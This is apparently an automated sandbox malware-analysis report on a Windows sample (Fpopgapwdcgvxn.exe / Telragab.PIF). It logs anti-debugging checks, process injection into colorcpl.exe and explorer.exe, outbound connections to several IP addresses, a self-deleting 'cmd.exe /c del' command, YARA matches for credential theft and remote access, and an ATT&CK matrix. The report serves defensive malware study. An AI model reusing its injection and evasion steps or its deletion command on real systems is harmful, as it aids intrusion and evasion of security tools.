              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFB97 mov eax, dword ptr fs:[00000030h]3_2_1E6EFB97
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D860 mov eax, dword ptr fs:[00000030h]3_2_1E62D860
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661876 mov eax, dword ptr fs:[00000030h]3_2_1E661876
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661876 mov eax, dword ptr fs:[00000030h]3_2_1E661876
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D878 mov eax, dword ptr fs:[00000030h]3_2_1E62D878
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663820 mov eax, dword ptr fs:[00000030h]3_2_1E663820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov ecx, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov eax, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov eax, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66182A mov eax, dword ptr fs:[00000030h]3_2_1E66182A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF80A mov eax, dword ptr fs:[00000030h]3_2_1E6EF80A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E659803 mov eax, dword ptr fs:[00000030h]3_2_1E659803
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1800 mov eax, dword ptr fs:[00000030h]3_2_1E6D1800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1800 mov eax, dword ptr fs:[00000030h]3_2_1E6D1800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B98E7 mov eax, dword ptr fs:[00000030h]3_2_1E6B98E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF8F8 mov eax, dword ptr fs:[00000030h]3_2_1E6EF8F8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6378D9 mov eax, dword ptr fs:[00000030h]3_2_1E6378D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6378D9 mov eax, dword ptr fs:[00000030h]3_2_1E6378D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ED8B0 mov eax, dword ptr fs:[00000030h]3_2_1E6ED8B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ED8B0 mov eax, dword ptr fs:[00000030h]3_2_1E6ED8B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF889 mov eax, dword ptr fs:[00000030h]3_2_1E6EF889
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6CB890 mov eax, dword ptr fs:[00000030h]3_2_1E6CB890
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6CB890 mov eax, dword ptr fs:[00000030h]3_2_1E6CB890
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627967 mov eax, dword ptr fs:[00000030h]3_2_1E627967
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E657962 mov eax, dword ptr fs:[00000030h]3_2_1E657962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66196E mov eax, dword ptr fs:[00000030h]3_2_1E66196E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66196E mov eax, dword ptr fs:[00000030h]3_2_1E66196E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B5960 mov eax, dword ptr fs:[00000030h]3_2_1E6B5960
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF97D mov eax, dword ptr fs:[00000030h]3_2_1E6EF97D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D978 mov eax, dword ptr fs:[00000030h]3_2_1E65D978
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63F950 mov eax, dword ptr fs:[00000030h]3_2_1E63F950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63F950 mov eax, dword ptr fs:[00000030h]3_2_1E63F950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E649950 mov eax, dword ptr fs:[00000030h]3_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E649950 mov eax, dword ptr fs:[00000030h]3_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BB953 mov eax, dword ptr fs:[00000030h]3_2_1E6BB953
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627931 mov eax, dword ptr fs:[00000030h]3_2_1E627931
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E5930 mov eax, dword ptr fs:[00000030h]3_2_1E6E5930
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E5930 mov ecx, dword ptr fs:[00000030h]3_2_1E6E5930
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65B919 mov eax, dword ptr fs:[00000030h]3_2_1E65B919
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h] | 3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6EB9EE mov eax, dword ptr fs:[00000030h] | 3_2_1E6EB9EE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6EB9EE mov ecx, dword ptr fs:[00000030h] | 3_2_1E6EB9EE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6B19EE mov eax, dword ptr fs:[00000030h] | 3_2_1E6B19EE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6359C0 mov eax, dword ptr fs:[00000030h] | 3_2_1E6359C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E70B9DF mov eax, dword ptr fs:[00000030h] | 3_2_1E70B9DF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h] | 3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E65D9D0 mov esi, dword ptr fs:[00000030h] | 3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6399BE mov eax, dword ptr fs:[00000030h] | 3_2_1E6399BE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6E598D mov eax, dword ptr fs:[00000030h] | 3_2_1E6E598D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6B9983 mov eax, dword ptr fs:[00000030h] | 3_2_1E6B9983
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E62B991 mov eax, dword ptr fs:[00000030h] | 3_2_1E62B991
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h] | 3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6DF99B mov ecx, dword ptr fs:[00000030h] | 3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E669660 mov eax, dword ptr fs:[00000030h] | 3_2_1E669660
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6CD660 mov eax, dword ptr fs:[00000030h] | 3_2_1E6CD660
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h] | 3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E705636 mov eax, dword ptr fs:[00000030h] | 3_2_1E705636
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E661607 mov eax, dword ptr fs:[00000030h] | 3_2_1E661607
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E66F603 mov eax, dword ptr fs:[00000030h] | 3_2_1E66F603
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E633616 mov eax, dword ptr fs:[00000030h] | 3_2_1E633616
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h] | 3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E65D6E0 mov eax, dword ptr fs:[00000030h] | 3_2_1E65D6E0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6636EF mov eax, dword ptr fs:[00000030h] | 3_2_1E6636EF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6ED6F0 mov eax, dword ptr fs:[00000030h] | 3_2_1E6ED6F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h] | 3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6F16CC mov eax, dword ptr fs:[00000030h] | 3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6EF6C7 mov eax, dword ptr fs:[00000030h] | 3_2_1E6EF6C7
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6616CF mov eax, dword ptr fs:[00000030h] | 3_2_1E6616CF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E62D6AA mov eax, dword ptr fs:[00000030h] | 3_2_1E62D6AA
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6276B2 mov eax, dword ptr fs:[00000030h] | 3_2_1E6276B2
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6B368C mov eax, dword ptr fs:[00000030h] | 3_2_1E6B368C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E62B765 mov eax, dword ptr fs:[00000030h] | 3_2_1E62B765
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E643740 mov eax, dword ptr fs:[00000030h] | 3_2_1E643740
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h] | 3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E703749 mov eax, dword ptr fs:[00000030h] | 3_2_1E703749
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6EF72E mov eax, dword ptr fs:[00000030h] | 3_2_1E6EF72E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E633720 mov eax, dword ptr fs:[00000030h] | 3_2_1E633720
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E64F720 mov eax, dword ptr fs:[00000030h] | 3_2_1E64F720
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E6F972B mov eax, dword ptr fs:[00000030h] | 3_2_1E6F972B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E70B73C mov eax, dword ptr fs:[00000030h] | 3_2_1E70B73C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E629730 mov eax, dword ptr fs:[00000030h] | 3_2_1E629730
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E665734 mov eax, dword ptr fs:[00000030h] | 3_2_1E665734
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E63973A mov eax, dword ptr fs:[00000030h] | 3_2_1E63973A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
              Source: C:\Users\Public\Libraries\Telragab.PIF | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_068B9AA0 rdtsc | 3_2_068B9AA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 3_2_1E672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 3_2_1E672EA0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe | Network Connect: 37.97.254.27 80
              Source: C:\Windows\explorer.exe | Network Connect: 62.72.50.88 80
              Source: C:\Windows\explorer.exe | Network Connect: 156.237.159.158 80
              Source: C:\Windows\explorer.exe | Network Connect: 104.140.89.24 80
              Source: C:\Windows\explorer.exe | Network Connect: 104.247.81.50 80
              Source: C:\Windows\explorer.exe | Network Connect: 34.93.103.39 80
              Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Telragab.PIF | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000 value starts with: 4D5A
              Source: C:\Users\Public\Libraries\Telragab.PIF | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C00000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 590000
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000
              Source: C:\Users\Public\Libraries\Telragab.PIF | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 4004
              Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 4004
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
              Source: explorer.exe, 00000005.00000000.2326909067.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4618461072.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4611738332.0000000000D69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: explorer.exe, 00000005.00000002.4623300730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2336924818.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_032B5DDC
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: GetLocaleInfoA, | 0_2_032BB910
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: GetLocaleInfoA, | 0_2_032BB8C4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_032B5EE8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032BA30C GetLocalTime, | 0_2_032BA30C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_033195F8 GetVersion, | 0_2_033195F8

              Stealing of Sensitive Information

              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
              1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information
              Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 Valid Accounts | 3 Obfuscated Files or Information | 11 Input Capture | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Screen Capture | Exfiltration Over Bluetooth | 1 Encrypted Channel | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
              Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 DLL Side-Loading | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Credential API Hooking | Automated Exfiltration | 3 Non-Application Layer Protocol | - | - | Data Encrypted for Impact | DNS Server | Email Addresses
              Local Accounts | Cron | Login Hook | 812 Process Injection | 1 Rootkit | NTDS | 124 System Information Discovery | Distributed Component Object Model | 11 Input Capture | Traffic Duplication | 13 Application Layer Protocol | - | - | Data Destruction | Virtual Private Server | Employee Names
